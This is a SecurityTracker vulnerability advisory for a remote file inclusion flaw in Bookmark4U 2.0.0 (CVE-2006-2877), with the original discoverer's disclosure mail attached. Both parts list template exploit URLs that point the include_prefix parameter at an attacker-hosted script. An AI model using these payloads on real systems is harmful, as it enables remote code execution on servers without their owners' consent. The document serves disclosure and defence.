Bookmark4U Include File Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1016224
|
|
SecurityTracker URL: http://securitytracker.com/id?1016224
|
|
CVE Reference: CVE-2006-2877
(Links to External Site)
|
Updated: May 22 2009
|
Original Entry Date: Jun 5 2006
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2.0.0
|
Description: A vulnerability was reported in Bookmark4U. A remote user can include and execute arbitrary code on the target system.
The software does not properly validate user-supplied input. A remote user can supply a specially crafted URL to cause the target
system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will
run with the privileges of the target web service.
http://[target]/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[attacker]
http://[target]/[Bookmark4Upath]/in
c/config.php?env[include_prefix]=[evil_scripts]
http://[target]/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
http://[target]/[Bookmark4Upath]/
inc/function.php?env[include_prefix]=[evil_scripts]
SnIpEr_SA discovered this vulnerability.
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: bookmark4u.sourceforge.net/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: selfar2002@hotmail.com
|
Message History:
None.
|
Source Message Contents
|
Date: 4 Jun 2006 14:39:27 -0000
From: selfar2002@hotmail.com
Subject: Bookmark4U Remote File Include
|
---------------------------------------------------------------------------
Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Bookmark4U
version : 2.0.0
URL :http://bookmark4u.sourceforge.net/
...
------------------------------------------------------------------
Exploit:
~~~~~~~~
# http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]
---------------------------------------------------------------------------
*/
Contact:
~~~~~~~~
SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*
-------------------------------- [ END ] ----------------------------------
|
|